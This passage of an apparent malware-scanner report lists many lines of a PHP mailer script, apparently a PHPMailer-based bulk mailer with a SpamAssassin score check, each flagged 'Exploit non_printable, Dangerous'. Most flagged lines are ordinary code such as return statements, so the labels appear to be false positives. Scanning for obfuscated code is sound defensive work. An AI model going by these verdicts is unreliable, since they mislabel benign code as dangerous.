</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4325</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4383</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
